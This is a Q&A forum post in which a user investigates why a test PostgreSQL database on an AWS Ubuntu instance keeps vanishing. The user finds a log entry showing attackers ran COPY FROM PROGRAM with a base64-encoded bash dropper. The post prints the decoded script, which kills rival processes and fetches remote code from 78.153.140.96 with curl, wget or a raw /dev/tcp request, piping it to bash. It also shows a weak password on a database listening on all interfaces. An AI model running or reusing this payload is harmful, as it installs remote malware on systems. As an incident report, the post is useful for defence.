postgresql amazon-web-services ubuntu amazon-ec2 tablespace

Missing user db on Postgresql AWS?

Why is my test user DB missing so often?

I'll leave my AWS instance stopped overnight and then restart it in the morning. But then I'm not able to login w/ my jdtest user account!

I keep getting the following in my system log

/var/lib/postgresql/log/postgresql-16-main.log

 LOG:  starting PostgreSQL 16.3 (Ubuntu 16.3-0ubuntu0.24.04.1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 13.2.0-23ubuntu4) 13.2.0, 64-bit
 LOG:  listening on IPv4 address "0.0.0.0", port 5432
 LOG:  listening on IPv6 address "::", port 5432
 LOG:  listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432"
 LOG:  database system was shut down at 2024-06-06 15:42:30 UTC
 LOG:  database system is ready to accept connections
 jdtest@jdtest FATAL:  database "jdtest" does not exist
 jdtest@jdtest FATAL:  database "jdtest" does not exist

The only way I can fix this is to reissue:

CREATE USER jdtest createdb login PASSWORD 'jdtest' ;
CREATE DATABASE jdtest owner jdtest;
GRANT ALL PRIVILEGES ON DATABASE jdtest TO jdtest;

But then the same problem keeps happening. :-(

Is there some kind of impermanence in the default AWS instance that, as a noob, I'm missing? Should I create some kind of (more permanent??) AWS datastore and an associated postgres tbs??

Notes:

The problem occurs overnight. I'm not sure it's necessary to leave the instance shutdown in order to duplicate the problem.
The installed postgresql package is the default that comes w/ the AWS Ubuntu instance.
I'm not using AWS RDS.
There is no DROP DATABASE in the log. The attached log is complete.
The entire instance & everything w/it is a test setup for learning purposes only.

Solution

Per above convo w/ jarmod & Klaver, I found the following in the postgresql system log:

2024-06-01 20:47:59.304 UTC [183888] pgg_superadmins@postgres STATEMENT:  DROP TABLE IF EXISTS CGTmqavu;CREATE TABLE CGTmqavu(cmd_output text);COPY CGTmqavu FROM PROGRAM 'echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDc4LjE1My4xNDAuOTYvcGcuc2h8YmFzaAplbGlmIFsgLXggIiQoY29tbWFuZCAtdiB3Z2V0KSIgXTsgdGhlbgogIHdnZXQgLXEgLU8tIDc4LjE1My4xNDAuOTYvcGcuc2h8YmFzaAplbHNlCiAgX19jdXJsIGh0dHA6Ly83OC4xNTMuMTQwLjk2L3BnMi5zaHxiYXNoCmZp|base64 -d|bash';SELECT * FROM CGTmqavu;DROP TABLE IF EXISTS CGTmqavu;

I believe I've been hacked. I took jarmod's suggestion:

ubuntu@ip-69-31-71-83:~$ echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDc4LjE1My4xNDAuOTYvcGcuc2h8YmFzaAplbGlmIFsgLXggIiQoY29tbWFuZCAtdiB3Z2V0KSIgXTsgdGhlbgogIHdnZXQgLXEgLU8tIDc4LjE1My4xNDAuOTYvcGcuc2h8YmFzaAplbHNlCiAgX19jdXJsIGh0dHA6Ly83OC4xNTMuMTQwLjk2L3BnMi5zaHxiYXNoCmZp|base64 -d

#!/bin/bash
pkill -f zsvc
pkill -f pdefenderd
pkill -f updatecheckerd

function __curl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}

if [ -x "$(command -v curl)" ]; then
  curl 78.153.140.96/pg.sh|bash
elif [ -x "$(command -v wget)" ]; then
  wget -q -O- 78.153.140.96/pg.sh|bash
else

I will rebuild the instance and restrict its security group to prevent access from the entire internet.

p.s. https://askto.pro/question/how-to-make-postgresql-work-with-telegram-bot#

https://cujo.com/blog/iot-malware-journals-prometei-linux/